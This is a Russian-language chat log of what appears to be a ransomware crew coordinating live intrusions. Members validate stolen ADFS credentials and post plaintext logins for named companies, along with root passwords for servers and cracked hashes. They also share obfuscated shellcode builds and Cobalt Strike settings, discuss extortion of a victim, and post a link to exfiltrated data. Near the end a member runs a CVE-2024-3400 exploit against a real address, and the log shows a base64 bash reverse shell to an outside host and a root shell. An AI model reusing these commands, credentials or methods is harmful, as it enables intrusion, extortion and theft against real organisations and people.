[2024-05-21 12:46:04] @usernamegg:matrix.bestflowers247.online: подойдут к впнам
--------------------
[2024-05-21 12:46:07] @usernamegg:matrix.bestflowers247.online: рдп веб и тд
--------------------
[2024-05-21 12:46:16] @usernamegg:matrix.bestflowers247.online: это доменные креды
--------------------
[2024-05-21 12:46:35] @lapa:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> sent a file.

так а этим что?)
--------------------
[2024-05-21 12:46:39] @lapa:matrix.bestflowers247.online: зря делал?)
--------------------
[2024-05-21 12:46:57] @lapa:matrix.bestflowers247.online: ну я эти креды поставлю на чекинг
--------------------
[2024-05-21 12:47:03] @lapa:matrix.bestflowers247.online: посмотрим до завтра что выйдет
--------------------
[2024-05-21 12:47:53] @usernamegg:matrix.bestflowers247.online: не зря
--------------------
[2024-05-21 12:48:01] @usernamegg:matrix.bestflowers247.online: мы идем по списку
--------------------
[2024-05-21 12:48:05] @usernamegg:matrix.bestflowers247.online: все что начекалось
--------------------
[2024-05-21 12:48:15] @usernamegg:matrix.bestflowers247.online: ту много очень универов и гов
--------------------
[2024-05-21 12:48:32] @usernamegg:matrix.bestflowers247.online: ну это поставщик еще такой у них обычный стиллер
--------------------
[2024-05-21 12:48:41] @usernamegg:matrix.bestflowers247.online: хз они откуда туда трафик гонят
--------------------
[2024-05-21 12:48:57] @lapa:matrix.bestflowers247.online: ну я могу чисто com пока почекать
--------------------
[2024-05-21 12:49:25] @lapa:matrix.bestflowers247.online: но как я понял, входишь, и потому выбирешь sso(а там 2аф)
--------------------
[2024-05-21 12:50:23] @lapa:matrix.bestflowers247.online: поставил чисто пока .com проверить на валид
--------------------
[2024-05-21 12:50:46] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-21 13:15:21] @usernameww:matrix.bestflowers247.online: id:fe7dff20-bca8-4262-b3d5-5830e31216f3
--------------------
[2024-05-21 13:16:50] @usernamegg:matrix.bestflowers247.online: a8b2287b-eee3-4b28-91f1-082e22eef989_encrypt_release_allsystem_x64_safe.zip
--------------------
[2024-05-21 13:16:51] @usernamegg:matrix.bestflowers247.online: 85af65f2-a2e2-4f97-bda1-dfdec01a9505_encrypt_release_allsystem_x64_safe.zip
--------------------
[2024-05-21 13:16:51] @usernamegg:matrix.bestflowers247.online: 9d93d877-bc86-4e22-88ad-377c2a85282a_encrypt_release_allsystem_x64_safe.zip
--------------------
[2024-05-21 13:17:26] @usernamegg:matrix.bestflowers247.online: df45ee4c-1060-483e-9214-884f23526c6c_encrypt_release_allsystem_x64_safe.zip
--------------------
[2024-05-21 13:17:32] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 13:22:07] @usernameww:matrix.bestflowers247.online: 4file.lockers.zip
--------------------
[2024-05-21 13:22:08] @usernameww:matrix.bestflowers247.online: Han: burrito
--------------------
[2024-05-21 13:34:09] @burito:matrix.bestflowers247.online: Ок
--------------------
[2024-05-21 13:36:37] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-21 13:36:39] @usernamegg:matrix.bestflowers247.online: ты как ?
--------------------
[2024-05-21 13:36:41] @usernamegg:matrix.bestflowers247.online: ты где ?
--------------------
[2024-05-21 13:36:50] @usernamegg:matrix.bestflowers247.online: голова кипит уже
--------------------
[2024-05-21 13:47:01] @muaddib6:matrix.org: в процессе
--------------------
[2024-05-21 13:49:04] @nickolas:talks.icu: привет
--------------------
[2024-05-21 13:49:06] @nickolas:talks.icu: я тут
--------------------
[2024-05-21 13:49:21] @nickolas:talks.icu: > <@usernamegg:matrix.bestflowers247.online> голова кипит уже

чего такое, что случилось ?
--------------------
[2024-05-21 13:49:34] @nickolas:talks.icu: я в ожидании фейков, чет расстраиваюсь по звонкам
--------------------
[2024-05-21 14:09:41] @usernamehunter:matrix.bestflowers247.online: > <@usernamett:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*wswsqldb$hp-pelzer.com$MSSQLSvc/WSWJITAPP001.hp-pelzer.com:SQLEXPRESS@HP-PELZER.COM*$ab15965de82b......e8c74ee8f2:wswsqldb

--------------------
[2024-05-21 14:10:44] @usernamett:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 14:36:27] @usernamegg:matrix.bestflowers247.online: ну у вас тема работает
--------------------
[2024-05-21 14:36:37] @usernamegg:matrix.bestflowers247.online: а ты под что фейки ждешь ?
--------------------
[2024-05-21 14:37:04] @usernamegg:matrix.bestflowers247.online: отчекалось ?
--------------------
[2024-05-21 14:37:36] @nickolas:talks.icu: мс
--------------------
[2024-05-21 14:37:51] @nickolas:talks.icu: все там уже финишная прямая, уже письма и шлюза для точечной рассылки готовим
--------------------
[2024-05-21 14:38:07] @nickolas:talks.icu: да тема работает, только блять все умирает, ничего не живет
--------------------
[2024-05-21 14:38:15] @nickolas:talks.icu: нужен какой то другой вектор входа
--------------------
[2024-05-21 14:39:18] @usernamegg:matrix.bestflowers247.online: 1951100441.1781.txt
--------------------
[2024-05-21 14:39:23] @usernamegg:matrix.bestflowers247.online: вот еще свежее скинули
--------------------
[2024-05-21 14:39:25] @usernamegg:matrix.bestflowers247.online: тот же чувак
--------------------
[2024-05-21 14:41:04] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-21 14:41:32] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> отчекалось ?

да, но не полностью еще
--------------------
[2024-05-21 14:41:48] @lapa:matrix.bestflowers247.online: скоро сброшу
--------------------
[2024-05-21 14:41:51] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 14:43:52] @lapa:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 14:44:12] @usernamegg:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 14:44:30] @chuck:talks.icu: привет
--------------------
[2024-05-21 14:45:49] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-21 14:46:49] @chuck:talks.icu: чето там в соксы набежало
--------------------
[2024-05-21 14:46:59] @chuck:talks.icu: вы грузили или песочницы?
--------------------
[2024-05-21 14:47:48] @usernamegg:matrix.bestflowers247.online: single_FI.ovpn
--------------------
[2024-05-21 14:48:11] @usernamegg:matrix.bestflowers247.online: песок да
--------------------
[2024-05-21 14:48:22] @usernamegg:matrix.bestflowers247.online: ip похожи
--------------------
[2024-05-21 14:49:28] @usernamegg:matrix.bestflowers247.online: single_FI.ovpn
--------------------
[2024-05-21 14:49:53] @chuck:talks.icu: понятно
--------------------
[2024-05-21 14:50:22] @chuck:talks.icu: слух, а можно кодера попросить чтобы сделали сортировку по времени первого появления сокса? чтобы новые наверху появлялись
--------------------
[2024-05-21 14:51:49] @usernamegg:matrix.bestflowers247.online: у сокс бота , конечнр
--------------------
[2024-05-21 14:52:01] @usernamegg:matrix.bestflowers247.online: слух, а можно кодера попросить чтобы сделали сортировку по времени первого появления сокса? чтобы новые наверху появлялись
--------------------
[2024-05-21 14:52:10] @chuck:talks.icu: было бы удобнее намного
--------------------
[2024-05-21 14:52:13] @usernamegg:matrix.bestflowers247.online: это квак просит сделать сортировку в сокс боте нашем
--------------------
[2024-05-21 14:52:22] @chuck:talks.icu: а то они расплодились, трудно там найи свой
--------------------
[2024-05-21 14:52:24] @usernamegg:matrix.bestflowers247.online: что бы по времени прилетала самый свежий сокс на верх
--------------------
[2024-05-21 14:52:27] @chuck:talks.icu: * а то они расплодились, трудно там найти свой
--------------------
[2024-05-21 14:52:32] @chuck:talks.icu: который только что пришел
--------------------
[2024-05-21 14:52:48] @usernamegg:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-21 14:52:55] @usernamegg:matrix.bestflowers247.online: * у сокс бота , конечно
--------------------
[2024-05-21 14:53:12] @usernamegg:matrix.bestflowers247.online: можете дать сервак я вам переподниму новый
--------------------
[2024-05-21 14:53:17] @usernamegg:matrix.bestflowers247.online: сокс бот и билды выдам
--------------------
[2024-05-21 14:53:21] @chuck:talks.icu: спасибо
--------------------
[2024-05-21 14:53:23] @usernamegg:matrix.bestflowers247.online: вы только будете его использовать
--------------------
[2024-05-21 14:53:36] @chuck:talks.icu: ага ща гляну
--------------------
[2024-05-21 14:53:38] @usernamegg:matrix.bestflowers247.online: так будет проще всем
--------------------
[2024-05-21 14:53:45] @chuck:talks.icu: да круть
--------------------
[2024-05-21 14:54:14] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 14:54:51] @nickolas:talks.icu: фух )
--------------------
[2024-05-21 14:55:00] @nickolas:talks.icu: придумал )))
--------------------
[2024-05-21 14:55:17] @usernamegg:matrix.bestflowers247.online: ну
--------------------
[2024-05-21 14:55:22] @nickolas:talks.icu: я думаю флуд нас сильно палит
--------------------
[2024-05-21 14:55:38] @usernamegg:matrix.bestflowers247.online: ну ты создаешь им причину что бы позвонить
--------------------
[2024-05-21 14:55:44] @nickolas:talks.icu: будем флудить заранее, а перезванивать будем через 2-3-4-5 дней
--------------------
[2024-05-21 14:55:51] @chuck:talks.icu: 5.161.250.129
root:kvhcpPHvCwWgRkkhtpjR

38.180.146.165
root:GcWN8pqqWp

--------------------
[2024-05-21 14:55:55] @nickolas:talks.icu: и будем говорить, что просто будем ставить спам фильтра
--------------------
[2024-05-21 14:56:12] @nickolas:talks.icu: таким образом мы снизим активность безопасников и админов, которые на шухере из за флуда, а причина все так же оставется
--------------------
[2024-05-21 14:56:28] @usernamegg:matrix.bestflowers247.online: ну как вариант
--------------------
[2024-05-21 14:56:36] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> фух )

сложно было ?)
--------------------
[2024-05-21 14:56:50] @nickolas:talks.icu: да знаешь, просто мысли не приходили в голову
--------------------
[2024-05-21 14:56:54] @usernamegg:matrix.bestflowers247.online: 5.161.250.129
root:kvhcpPHvCwWgRkkhtpjR

38.180.146.165
root:GcWN8pqqWp
--------------------
[2024-05-21 14:57:00] @usernamegg:matrix.bestflowers247.online: вот сервера
--------------------
[2024-05-21 14:57:05] @usernamegg:matrix.bestflowers247.online: они просят им поднять сокс бота
--------------------
[2024-05-21 14:57:09] @usernamegg:matrix.bestflowers247.online: но сперва фикс внеси плз
--------------------
[2024-05-21 14:57:14] @nickolas:talks.icu: оно же сам знаешь как бывает, сидишь сидишь и приходит озарение =)
--------------------
[2024-05-21 14:57:19] @usernamegg:matrix.bestflowers247.online: и потом выдай сразу с билдами мне
--------------------
[2024-05-21 14:57:38] @usernamegg:matrix.bestflowers247.online: ага )
--------------------
[2024-05-21 14:57:49] @usernamegg:matrix.bestflowers247.online: лампочка загорелась
--------------------
[2024-05-21 14:57:50] @nickolas:talks.icu: я вот недели две не мог придумать, чем бы улучшить схему.
вроде и так, и сяк, и этак
--------------------
[2024-05-21 14:58:00] @nickolas:talks.icu: и все понимаешь, что блин че-то не то...
--------------------
[2024-05-21 15:00:12] @lapa:matrix.bestflowers247.online: ну я тут чисто .com чекаю
--------------------
[2024-05-21 15:00:19] @lapa:matrix.bestflowers247.online: если нужно все прочекать все же, скажите
--------------------
[2024-05-21 15:02:44] @lapa:matrix.bestflowers247.online: 2024-05-21T18:01:19+03:00	https://o365.pttgrp.com/adfs/ls/idpinitiatedsignon.aspx	znakkaphun.y@pttdigital.com	Namnoue@@0828524454@@
--------------------
[2024-05-21 15:02:54] @lapa:matrix.bestflowers247.online: вот тут интересно, просто вход и все
--------------------
[2024-05-21 15:03:00] @lapa:matrix.bestflowers247.online: без выбора группы
--------------------
[2024-05-21 15:03:48] @lapa:matrix.bestflowers247.online: можно еще наши базы мыло и пасс прочекать на adfs эти
--------------------
[2024-05-21 15:03:53] @lapa:matrix.bestflowers247.online: если нужно
--------------------
[2024-05-21 15:06:38] @usernamezz:matrix.bestflowers247.online: `https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx	devil28@jacksonsshop.com	create-accountA4`
--------------------
[2024-05-21 15:08:46] @usernamegg:matrix.bestflowers247.online: ну я думаю что надо собрать у всех поставщиков такое добро
--------------------
[2024-05-21 15:09:02] @usernamegg:matrix.bestflowers247.online: отчекать и эти креды как минимум это доступ в впну
--------------------
[2024-05-21 15:09:26] @usernamegg:matrix.bestflowers247.online: я пока хоть в один нормально хочу попасть и увидеть там что то
--------------------
[2024-05-21 15:09:47] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> отчекать и эти креды как минимум это доступ в впну

ну вот я их чекаю
--------------------
[2024-05-21 15:09:57] @lapa:matrix.bestflowers247.online: нихера пока нет с этих кредов доступа в впн
--------------------
[2024-05-21 15:20:29] @usernamegg:matrix.bestflowers247.online: adfs.txt
--------------------
[2024-05-21 15:20:30] @usernamegg:matrix.bestflowers247.online: вот тот который нам приносит IMAP1405
--------------------
[2024-05-21 15:21:23] @muaddib6:matrix.org: > <@usernameww:matrix.bestflowers247.online> sent a file.

Готово
--------------------
[2024-05-21 15:25:25] @muaddib6:matrix.org: 1.7z
--------------------
[2024-05-21 15:28:16] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 15:30:31] @usernameyy:matrix.bestflowers247.online: хорошо
--------------------
[2024-05-21 15:30:42] @usernameyy:matrix.bestflowers247.online: мне где то час на всё про всё понадобится
--------------------
[2024-05-21 15:30:51] @usernameyy:matrix.bestflowers247.online: там просто не таблица вообще)
--------------------
[2024-05-21 15:30:52] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 15:31:02] @usernamegg:matrix.bestflowers247.online: ok
--------------------
[2024-05-21 15:31:16] @usernamegg:matrix.bestflowers247.online: мне час надо
--------------------
[2024-05-21 15:31:20] @usernamegg:matrix.bestflowers247.online: там не таблица просто
--------------------
[2024-05-21 15:31:31] @chuck:talks.icu: ага хорошо
--------------------
[2024-05-21 15:32:07] @usernameyy:matrix.bestflowers247.online: а хотя
--------------------
[2024-05-21 15:32:11] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-21 15:32:17] @usernameyy:matrix.bestflowers247.online: это опционально или везде так сделать?
--------------------
[2024-05-21 15:32:30] @usernamegg:matrix.bestflowers247.online: лучше на всех так сделать
--------------------
[2024-05-21 15:32:33] @usernameyy:matrix.bestflowers247.online: ок
--------------------
[2024-05-21 15:32:36] @usernamegg:matrix.bestflowers247.online: что бы свежий сокс всегда вверх прилетал
--------------------
[2024-05-21 15:32:51] @chuck:talks.icu: не mysql?
--------------------
[2024-05-21 15:33:17] @usernamegg:matrix.bestflowers247.online: не
--------------------
[2024-05-21 15:33:27] @lapa:matrix.bestflowers247.online: не берите может пока, а то сейчас поймете, что сделать собо ничего не можете
--------------------
[2024-05-21 15:33:41] @chuck:talks.icu: ясно
--------------------
[2024-05-21 15:35:45] @usernameyy:matrix.bestflowers247.online: не могу подключиться к билдеру 95.216.228.249
--------------------
[2024-05-21 15:36:39] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2024-05-21 15:38:18] @usernameyy:matrix.bestflowers247.online: поднялся
--------------------
[2024-05-21 15:40:32] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 15:42:57] @usernameyy:matrix.bestflowers247.online: 5.161.250.129:80.bin
--------------------
[2024-05-21 15:42:58] @usernameyy:matrix.bestflowers247.online: готово
--------------------
[2024-05-21 15:44:51] @lapa:matrix.bestflowers247.online: `https://adfs.mavex.mavenir.com/adfs/ls/idpinitiatedsignon.aspx	mavex.com\george.adamopoulos	Mavenir$1234`
--------------------
[2024-05-21 15:45:06] @lapa:matrix.bestflowers247.online: я вот тут пошел вообще в какую-то crm систему наверное
--------------------
[2024-05-21 15:45:24] @usernameyy:matrix.bestflowers247.online: 38.180.146.165:443.bin
--------------------
[2024-05-21 15:45:25] @usernameyy:matrix.bestflowers247.online: 38.180.146.165:80.bin
--------------------
[2024-05-21 15:45:59] @usernameyy:matrix.bestflowers247.online: 5.161.250.129:443.bin
--------------------
[2024-05-21 15:46:13] @usernameyy:matrix.bestflowers247.online: подключаться также
```
basic:
aZ1HA94yLKuNChMqN
Zwn3U87Px*i1eU&aj&0UUoyWjuY5JR
--------------------
[2024-05-21 15:46:40] @usernameyy:matrix.bestflowers247.online: * подключаться также

```
http://5.161.250.129:81/
http://38.180.146.165:81/
basic:
aZ1HA94yLKuNChMqN
Zwn3U87Px*i1eU&aj&0UUoyWjuY5JR
```
--------------------
[2024-05-21 15:48:49] @usernamecc:matrix.bestflowers247.online: 🤣
--------------------
[2024-05-21 15:57:29] @usernamess:matrix.bestflowers247.online: ```
spawnto x64 %windir%\sysnative\svchost.exe -k LocalService
spawnto x86 %windir%\syswow64\svchost.exe -k netsvcs
```
--------------------
[2024-05-21 16:06:23] @lapa:matrix.bestflowers247.online: `2024-05-21T18:10:18+03:00	https://adfs.s2hgroup.com/adfs/ls/idpinitiatedsignon.aspx	s2h\rkmunar	S2h123456+`
--------------------
[2024-05-21 16:06:30] @lapa:matrix.bestflowers247.online: вот тут вот есть cisco
--------------------
[2024-05-21 16:06:36] @lapa:matrix.bestflowers247.online: но 2аф просит
--------------------
[2024-05-21 16:13:25] @burito:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> 4file.lockers.zip

lockers
--------------------
[2024-05-21 16:13:26] @burito:matrix.bestflowers247.online: lcrs.zip
--------------------
[2024-05-21 16:21:13] @lapa:matrix.bestflowers247.online: ADFS_VALID_idpinitiatedsignon.txt
--------------------
[2024-05-21 16:21:18] @burito:matrix.bestflowers247.online: привет
покушать бы
19RdXdWXKJxf8SFndnvvpCAxUptBbQpqgG
--------------------
[2024-05-21 16:21:22] @lapa:matrix.bestflowers247.online: офнусь
--------------------
[2024-05-21 16:37:27] @usernamegg:matrix.bestflowers247.online: спасибо
--------------------
[2024-05-21 16:37:35] @usernamegg:matrix.bestflowers247.online: 5.161.250.129:80.bin
--------------------
[2024-05-21 16:37:41] @usernamegg:matrix.bestflowers247.online: 38.180.146.165:443.bin
--------------------
[2024-05-21 16:37:44] @usernameyy:matrix.bestflowers247.online: пожалуйста)
--------------------
[2024-05-21 16:37:46] @usernamegg:matrix.bestflowers247.online: 38.180.146.165:80.bin
--------------------
[2024-05-21 16:37:50] @usernamegg:matrix.bestflowers247.online: 5.161.250.129:443.bin
--------------------
[2024-05-21 16:37:57] @usernamegg:matrix.bestflowers247.online: подключаться также

```
http://5.161.250.129:81/
http://38.180.146.165:81/
basic:
aZ1HA94yLKuNChMqN
Zwn3U87Px*i1eU&aj&0UUoyWjuY5JR
```
--------------------
[2024-05-21 16:38:21] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 16:38:34] @chuck:talks.icu: ага принял, спасибо
--------------------
[2024-05-21 16:41:35] @usernamehunter:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> ```
> 45c295485d8d11b52ea520778ba0ff6c
> d712ab76f1d779d2b6e337bf98a3071c
> ```

45c295485d8d11b52ea520778ba0ff6c:Lie$ieux!

--------------------
[2024-05-21 16:41:47] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 16:42:02] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> я вот тут пошел вообще в какую-то crm систему наверное

ага , вижу
--------------------
[2024-05-21 16:42:05] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> но 2аф просит

да
--------------------
[2024-05-21 16:42:16] @usernamegg:matrix.bestflowers247.online: на крипт бентли отдай
--------------------
[2024-05-21 16:43:11] @usernamegg:matrix.bestflowers247.online: он делает с обфусцированием.
--------------------
[2024-05-21 16:46:54] @chuck:talks.icu: хорошо
--------------------
[2024-05-21 16:47:08] @chuck:talks.icu: возобновим сотрудничество )
--------------------
[2024-05-21 16:49:34] @usernamegg:matrix.bestflowers247.online: таргеты по ревенью хорошие, работа на линукс поднимаем шелл потом прокидываем тунель далее берем инфу с самой этой глобал протек логин + хэш, дальше снифать керберосы от рдп и днс
--------------------
[2024-05-21 16:49:50] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 16:49:55] @usernamegg:matrix.bestflowers247.online: я оплачиваю ему подписку
--------------------
[2024-05-21 16:49:57] @usernamegg:matrix.bestflowers247.online: могу скинуть
--------------------
[2024-05-21 16:50:09] @usernamegg:matrix.bestflowers247.online: 5.161.250.129:80.bin
--------------------
[2024-05-21 16:50:16] @usernamegg:matrix.bestflowers247.online: 38.180.146.165:443.bin
--------------------
[2024-05-21 16:50:22] @usernamegg:matrix.bestflowers247.online: 38.180.146.165:80.bin
--------------------
[2024-05-21 16:50:25] @chuck:talks.icu: ну закинь если не сложно, а мы тогда с понедельника возобновим
--------------------
[2024-05-21 16:50:26] @usernamegg:matrix.bestflowers247.online: 5.161.250.129:443.bin
--------------------
[2024-05-21 16:50:27] @chuck:talks.icu: спасибо тебе
--------------------
[2024-05-21 16:50:50] @chuck:talks.icu: он у нас долго без работы был
--------------------
[2024-05-21 16:51:03] @usernamegg:matrix.bestflowers247.online: закинул
--------------------
[2024-05-21 16:51:03] @chuck:talks.icu: а потом мы начали ssh грузить, ну и ему вобще делать нечего стало
--------------------
[2024-05-21 16:51:10] @chuck:talks.icu: ок
--------------------
[2024-05-21 16:51:15] @usernamegg:matrix.bestflowers247.online: ага
--------------------
[2024-05-21 16:51:23] @usernamegg:matrix.bestflowers247.online: сокс бот
--------------------
[2024-05-21 16:51:35] @usernamegg:matrix.bestflowers247.online: обфусцировать
--------------------
[2024-05-21 16:51:43] @usernamegg:matrix.bestflowers247.online: точка входа для длл любая
--------------------
[2024-05-21 16:51:43] @muaddib6:matrix.org: с какой точкой входа сделать?
--------------------
[2024-05-21 16:51:58] @usernamegg:matrix.bestflowers247.online: главное что бы чисто было максимально
--------------------
[2024-05-21 16:52:32] @muaddib6:matrix.org: понял. занимаюсь
--------------------
[2024-05-21 16:53:36] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 16:53:41] @usernamegg:matrix.bestflowers247.online: ушло
--------------------
[2024-05-21 16:53:46] @usernamegg:matrix.bestflowers247.online: приятного
--------------------
[2024-05-21 16:53:57] @usernamegg:matrix.bestflowers247.online: я не трогаю правда твой крипт уже полтора месяца
--------------------
[2024-05-21 16:54:34] @muaddib6:matrix.org: 64 битные?
--------------------
[2024-05-21 16:56:54] @usernamegg:matrix.bestflowers247.online: 64 битные?

--------------------
[2024-05-21 16:56:58] @usernamegg:matrix.bestflowers247.online: или ?
--------------------
[2024-05-21 16:57:06] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2024-05-21 16:58:03] @usernameyy:matrix.bestflowers247.online: шеллкоды только x64
--------------------
[2024-05-21 16:58:21] @usernamegg:matrix.bestflowers247.online: шеллкоды только x64
--------------------
[2024-05-21 16:58:26] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2024-05-21 16:58:41] @muaddib6:matrix.org: хорошо
--------------------
[2024-05-21 16:59:02] @burito:matrix.bestflowers247.online: Спасибо
--------------------
[2024-05-21 16:59:05] @burito:matrix.bestflowers247.online: Почему?
--------------------
[2024-05-21 16:59:18] @burito:matrix.bestflowers247.online: Ок
--------------------
[2024-05-21 17:06:38] @usernamegg:matrix.bestflowers247.online: не нравиться ребятам крипт кобы
--------------------
[2024-05-21 17:06:40] @usernamegg:matrix.bestflowers247.online: локера норм
--------------------
[2024-05-21 17:06:45] @usernamegg:matrix.bestflowers247.online: используем
--------------------
[2024-05-21 17:06:45] @chuck:talks.icu: а что это за формат файлов?
--------------------
[2024-05-21 17:06:48] @chuck:talks.icu: .bin
--------------------
[2024-05-21 17:06:55] @chuck:talks.icu: архив какойто?
--------------------
[2024-05-21 17:07:11] @burito:matrix.bestflowers247.online: А что именно?
--------------------
[2024-05-21 17:07:15] @usernamegg:matrix.bestflowers247.online: ну ты что старый)
--------------------
[2024-05-21 17:07:18] @burito:matrix.bestflowers247.online: Пусть говорят, что не так
--------------------
[2024-05-21 17:07:24] @usernamegg:matrix.bestflowers247.online: шеллкоды x64
--------------------
[2024-05-21 17:07:41] @chuck:talks.icu: аа
--------------------
[2024-05-21 17:07:41] @usernamegg:matrix.bestflowers247.online: бинарный
--------------------
[2024-05-21 17:07:50] @chuck:talks.icu: все понял
--------------------
[2024-05-21 17:08:04] @chuck:talks.icu: то есть вы его изначально как шеллкод делаете
--------------------
[2024-05-21 17:08:07] @usernamegg:matrix.bestflowers247.online: палит почему то больше чем от хана
--------------------
[2024-05-21 17:08:16] @usernamegg:matrix.bestflowers247.online: только я могу делать нормальный билд на крипт
--------------------
[2024-05-21 17:08:19] @usernamegg:matrix.bestflowers247.online: по этому сам скидываю
--------------------
[2024-05-21 17:08:25] @usernamegg:matrix.bestflowers247.online: им не дают свои cna
--------------------
[2024-05-21 17:08:34] @usernamegg:matrix.bestflowers247.online: угу
--------------------
[2024-05-21 17:08:48] @burito:matrix.bestflowers247.online: Хз, у нас с ним технологии плюс минус одно и тоже
--------------------
[2024-05-21 17:09:03] @usernamegg:matrix.bestflowers247.online: https://github.com/Chocapikk/CVE-2024-3400
--------------------
[2024-05-21 17:09:08] @usernamegg:matrix.bestflowers247.online: на линукс
--------------------
[2024-05-21 17:09:18] @burito:matrix.bestflowers247.online: Если какой-то ав именно, тогда надо его обозначить
--------------------
[2024-05-21 17:09:51] @usernamegg:matrix.bestflowers247.online: понял
--------------------
[2024-05-21 17:09:53] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2024-05-21 17:09:55] @usernamegg:matrix.bestflowers247.online: ты прокачался ?
--------------------
[2024-05-21 17:12:15] @burito:matrix.bestflowers247.online: Инфицирование такое же как у него сделал с месяца два назад
--------------------
[2024-05-21 17:12:38] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-21 17:12:42] @usernamegg:matrix.bestflowers247.online: красавец
--------------------
[2024-05-21 17:12:48] @usernamegg:matrix.bestflowers247.online: значит я буду использовать
--------------------
[2024-05-21 17:13:31] @burito:matrix.bestflowers247.online: Если там какой-то ав стоит, у него может пробить, у меня нет, тут только такая ситуация может быть. Или наоборот, смотря короче какой ав там
--------------------
[2024-05-21 17:15:10] @usernamegg:matrix.bestflowers247.online: ```
\\acct\MBE Certification Docs\New York City - Small Business Services.pdf    *** Line 576

│   │   │   │   │   │   │   │   ├── TE200.00 - 4 (PO #SPO0019081 Q162 NP Citrix Cloud Based License).pdf  *** Line 58564

│   │   │       │   ├── Project X Cost Risk Results.pdf    ***Line 175684
```
--------------------
[2024-05-21 17:15:21] @usernamegg:matrix.bestflowers247.online: pmaconsultants.com
--------------------
[2024-05-21 17:16:41] @usernamegg:matrix.bestflowers247.online: I confirm the files match our records. As for recovery it is still a long road ahead. The software seems to run slowly and we have thousands of servers to work on.
--------------------
[2024-05-21 17:16:45] @usernamegg:matrix.bestflowers247.online: не ответил им
--------------------
[2024-05-21 17:17:37] @usernamegg:matrix.bestflowers247.online: сам сплоит отрабатывает до 5 минут если не поднял повторно
--------------------
[2024-05-21 17:17:45] @usernamegg:matrix.bestflowers247.online: жди поднимаю шелл
--------------------
[2024-05-21 17:20:49] @usernamecc:matrix.bestflowers247.online: ```
pmaconsultants.com \\ PMA__FILE$
http://temp.sh/zAbLT/SNKFaUWDcAgGRBrP2evyZ7qC98T4f6Lw5phHdj3n.zip
SNKFaUWDcAgGRBrP2evyZ7qC98T4f6Lw5phHdj3n.zip
extract pass : pgzawAqmxc5CJ9Ghkn7Eu2d63NrVTyKtjBQFvHYb
```
--------------------
[2024-05-21 17:22:54] @usernamegg:matrix.bestflowers247.online: python3 exploit.py -u https://202.55.69.146 -lh 217.79.244.162 -lp 34058
--------------------
[2024-05-21 17:23:22] @usernamegg:matrix.bestflowers247.online: ```
[+] Vulnerable: https://202.55.69.146
/../../../../opt/panlogs/tmp/device_telemetry/minute/test`echo${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTcuNzkuMjQ0LjE2Mi8zNDA1OCAwPiYx|base64${IFS}-d|bash`
[+] Exploit request sent successfully.
[!] Exploiting telemetry, please wait some minutes...
[+] Received connection from 202.55.69.146:58305
[13:19:19] 202.55.69.146:58305: normalizing shell path            manager.py:957
[13:19:23] 202.55.69.146:58305: registered new host w/ db         manager.py:957
[+] Dropping to pwncat prompt...
(local) pwncat$
```
--------------------
[2024-05-21 17:23:28] @usernamegg:matrix.bestflowers247.online: (local) pwncat$ -- это оболочка
--------------------
[2024-05-21 17:23:33] @usernamegg:matrix.bestflowers247.online: забиваешь (local) pwncat$back энтер
--------------------
[2024-05-21 17:23:39] @usernamegg:matrix.bestflowers247.online: попадаешь в рутт шелла
--------------------
[2024-05-21 17:23:46] @usernamegg:matrix.bestflowers247.online: (local) pwncat$ back
(remote) root@AAM-FW01-SG:/root#
--------------------
[2024-05-21 17:23:55] @usernamegg:matrix.bestflowers247.online: там смотри в .db файлах хэши впн + ставь сниффер на сбор керберосов
--------------------
[2024-05-21 17:26:28] @usernamejj:matrix.bestflowers247.online: ```
python3 exploit.py -u https://202.55.69.146 -lh 217.79.244.162 -lp 34058
Traceback (most recent call last):
File "/root/CVE-2024-3400/exploit.py", line 7, in <module>
import pwncat.manager
ModuleNotFoundError: No module named 'pwncat'
```

--------------------
[2024-05-21 17:31:42] @usernamegg:matrix.bestflowers247.online: > <@usernamejj:matrix.bestflowers247.online> ```
> python3 exploit.py -u https://202.55.69.146 -lh 217.79.244.162 -lp 34058
> Traceback (most recent call last):
>   File "/root/CVE-2024-3400/exploit.py", line 7, in <module>
>     import pwncat.manager
> ModuleNotFoundError: No module named 'pwncat'
> ```

Бро ну так pip install pwncat
pip install -r requirements.txt
--------------------
[2024-05-21 17:37:07] @usernamejj:matrix.bestflowers247.online: ```
proxychains ssh root@23.95.182.8
Password:  TTfgr43Fb_L3Fx^Jk82!E)_Vvcx34
```
--------------------
